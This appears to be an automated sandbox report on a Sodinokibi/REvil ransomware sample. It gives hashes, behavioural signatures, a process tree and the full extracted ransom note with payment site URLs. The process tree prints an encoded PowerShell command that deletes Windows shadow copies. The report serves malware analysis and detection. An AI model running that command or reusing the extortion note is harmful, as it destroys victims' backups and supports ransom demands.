Analysis

  • max time kernel
    144s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:26

General

  • Target

    a28e23ad4033341694551d6f59737138de9f1997384da5ae9a1642cc8c9e237f.exe

  • Size

    116KB

  • MD5

    2894ecbd12a791cbf7404febb43b5f4e

  • SHA1

    8ed5327cf869893d6099df145c49aec08c86faa6

  • SHA256

    a28e23ad4033341694551d6f59737138de9f1997384da5ae9a1642cc8c9e237f

  • SHA512

    8b7a9ab31b4ff2f37d772308db28717947624d172b5b23e9979623e3cf03fa109480f83aa9243fa9ecf7d2fb7a7cc4deb5899b5f462d0c911bee3dab3e4b6115

Malware Config

Extracted

Path

C:\ko665-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ko665. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/59B1DB071E79C2A5 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/59B1DB071E79C2A5 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: lzW7gggLq3LBFW12CMv4Dx88irgZstjWCBiJGxdgfH8v3p8Z4b7+du3Wq3XRXypu SHjclxENu7OqDgNfp+TkGa2bymeFVHP4vvwJvX5Mz/j88Rb/2/vKuXB5mPTCuqOd dlyO9q9OyN6skItsYGxWwObeX8t6ek2l+S8SfSnk9zPBJ07jKaG183/xnBRNerRV 6SAZ1qngmOZ2J0SjLD0j/c3Es6rGIo46iOMfP+pOEqiYW3z6E6tb5h7++skkuO+4 veZw64VqftubGbptWfYfRlsR2q/Wv+7EQ1BDvi/DYciydFPBaTGNg0PBGoKcrvd3 HofsXnJrSgoPvPdl15rNewnoFP6zTNKT/gQtrwMl67GQy7XEuSdcHom8e151dpGJ yxEcJ+QjIq30WfJJlCVbVtAAqz0bxg+CWk3eGCGN29yF1/NYPTt639vk36lJoyzd SqpEGkGC1PV3Hf5TLwxHGZLJmQRlIivmNndClGqJJTQNwcNg39Pfj3WhlDQKx5DV UFDUfv8AlkyfF5Qcy/8ijRrwS/+FfXc7QS8D8fe8jqorr453Jc4TG5DmuH5lezR4 b4J/Wf/GVKjI8bRNbMVNUbIvZSK5I3IJxCNgzmDkKYi3soaRHSaXCOqgxW3VcKo2 jUwthpyMA210k94A1nT3DvRhnP4m6Y/45lwKmT+SuG6DJHRQ0t7P+1wqJ8Go9XtM a/mAYQsXwGyOUPMA3bK3YhYJZ5fOIwGf8dvQqxNhTgEqmtIZ8o1uhPzcbknpak89 TC81a4mC+evSqlLaeMoVUshard+Og3pj7TsovYP91GCR1m0vzgB0ar6WONHPBp8S f7JHM5915e5YAO5TokG/nsHb/6sOxpW3C0G6h/kjKJsX+1hVhvaQhOQ6RBqGCMtY +LDkhQt9ewRithfDOcuVbEkOfOn8Xo47u2eHGece6ZZV3nMy69o7xPeyn9Ah+BWw NyWzUeA5i+Jv1DAb+RuszYbo/NlkXmMhZpv1EddEQkLcElH9PmaKRVxh69pwnbda R3hzP/pT4qtTLvCSPcLz/pVQ23meiaJB2VVhU4GX0pDzngGsRSjc8XxYFhHNVFAo 9btz7bl6/ANvZwoV6d3DJaJebHhZoyJFm8Z/mUntdgfmzrLL9Ej2IcVibql3yxbs A8arYb4jho2fAtT1m5zMop1R4+wYWNq3Np4CvzdHQ6FsmVjYPQhPFRDrxG+DCoLm YMlv7AobxHLLZJwipbMaezxYbrLmgdv1SDkxkG55P/rXjd5gI6+Ew7Kj6ratpCf+ XStdNpS6XosupLaQH2ABU/KUg7y4WQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/59B1DB071E79C2A5

http://decryptor.cc/59B1DB071E79C2A5

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 63 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 30 IoCs
  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a28e23ad4033341694551d6f59737138de9f1997384da5ae9a1642cc8c9e237f.exe
    "C:\Users\Admin\AppData\Local\Temp\a28e23ad4033341694551d6f59737138de9f1997384da5ae9a1642cc8c9e237f.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:896
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1524
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1256
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1200 -s 3016
      1⤵
      • Program crash
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1000

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \??\c:\users\admin\appdata\roaming\microsoft\windows\recent\customdestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      55ff845f3bd13cf4f644bc22370d4674

      SHA1

      77983f747d89791cb23256cf2890de0b6b728054

      SHA256

      856ad94421d71a14ffdd793bb76663426812ed8aafa39ca82521bb2b21023068

      SHA512

      f35b9a9bc62e49f79e906879a89c8faf149d3e9b7773b483149620f124efc9a794978590918427e9eb03a5c9e5274f41c280d2dee52335328bdefbd9cc03df19

    • memory/896-55-0x000007FEFB9C1000-0x000007FEFB9C3000-memory.dmp
      Filesize

      8KB

    • memory/896-57-0x0000000002800000-0x0000000002802000-memory.dmp
      Filesize

      8KB

    • memory/896-58-0x0000000002802000-0x0000000002804000-memory.dmp
      Filesize

      8KB

    • memory/896-59-0x0000000002804000-0x0000000002807000-memory.dmp
      Filesize

      12KB

    • memory/896-56-0x000007FEF2D90000-0x000007FEF38ED000-memory.dmp
      Filesize

      11.4MB

    • memory/896-60-0x000000000280B000-0x000000000282A000-memory.dmp
      Filesize

      124KB

    • memory/1000-64-0x0000000000460000-0x0000000000461000-memory.dmp
      Filesize

      4KB

    • memory/1692-54-0x0000000075B51000-0x0000000075B53000-memory.dmp
      Filesize

      8KB